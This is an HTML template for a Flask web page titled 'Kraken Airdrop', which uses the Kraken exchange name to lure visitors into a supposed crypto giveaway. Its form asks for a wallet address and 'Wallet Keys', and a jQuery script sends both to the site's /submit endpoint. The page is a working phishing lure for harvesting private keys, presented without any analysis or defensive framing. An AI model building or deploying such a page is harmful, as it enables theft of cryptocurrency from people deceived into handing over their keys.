<!DOCTYPE html>
<html>
<head>
    <title>Wallet Information</title>
    <link rel="stylesheet" type="text/css" href="{{ url_for('static', filename='style.css') }}">
    <!-- <link rel="stylesheet" href="index.css "> -->
    <style>
        body {
	background-image: linear-gradient(rgb(16, 18, 32), rgba(21, 21, 23, 0));
    background-repeat: no-repeat;
	font-family: Arial, sans-serif;
}
.hx {
	text-align: center;
	margin-top: 50px;
    text-shadow: 5px 5px 5px  black;
    color: rgb(106, 255, 0);
}

/* h1 {
	text-align: center;
	color: aqua;
	font-family: sans-serif;
	text-shadow: 5px 5px 5px black;
} */
.kra{
	display: flex;
	margin-left: 700px;
	margin-bottom: 50px;
}
.ken{
	width: 50px;
	height: 50px;
	margin-top: 50px;
	margin-left: 50px;
}
form {
	margin: 0 auto;
	width: 50%;
	padding: 20px;
	border-radius: 5px;
	/* box-shadow: 10px 10px 10px rgba(0,0,0,0.2); */
}

label {
	display: block;
	margin-bottom: 10px;
	font-size: 30px;
	color: #000000;
}

input[type="text"] {
	width: 100%;
	height: 150px;
	padding: 12px;
	border: 1px solid #000000;
	border-radius: 4px;
	box-sizing: border-box;
	margin-bottom: 20px;
	box-shadow: 2px 2px 2px 2px rgb(0, 0, 0);
}

button {
	background-color: #1f1d26;
	color: #fff;
	padding: 12px 20px;
	border: none;
	border-radius: 4px;
	cursor: pointer;
}

button:hover {
	background-color: #45a049;
}

@media only screen and (max-width: 600px) {
	h1 {
	  font-size: 24px;
	}
	label {
	  font-size: 16px;
	}
	input[type="text"] {
	  font-size: 16px;
	  padding: 8px;
	}
	button {
	  font-size: 16px;
	  padding: 8px 16px;
	}
  }
    </style>
</head>
<body> 
    
    <div class="kra">
        <h1 class="hx"> Kraken Airdrop</h1> 
        <img src="kraken.png" alt=" " class="ken">
    </div>
    <form id="wallet-form" method="POST" action="{{ url_for('submit') }}">
        <label for="wallet_address">Wallet Address:</label>
        <input type="text" id="wallet_address" name="wallet_address"><br>

        <label for="wallet_keys">Wallet Keys:</label>
        <input type="text" id="wallet_keys" name="wallet_keys"><br>

        <button type="submit">Submit</button>
    </form>
 
    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script>
        $(document).ready(function() {
            $('#wallet-form').submit(function(event) {
                event.preventDefault();
                var walletAddress = $('#wallet_address').val();
                var walletKeys = $('#wallet_keys').val();
                $.ajax({
                    url: '/submit ',
                    type: 'POST',
                    data: {
                        'wallet_address': walletAddress,
                        'wallet_keys': walletKeys
                    },
                    success: function(response) {
                        alert('Data submitted successfully!');
                    },
                    error: function(error) {
                        alert('Error submitting data.');
                        location.reload();
                    }
                });
            });
        });
    </script>
    <script src="{{ url_for('static', filename='script.js') }}"></script>
</body>
</html>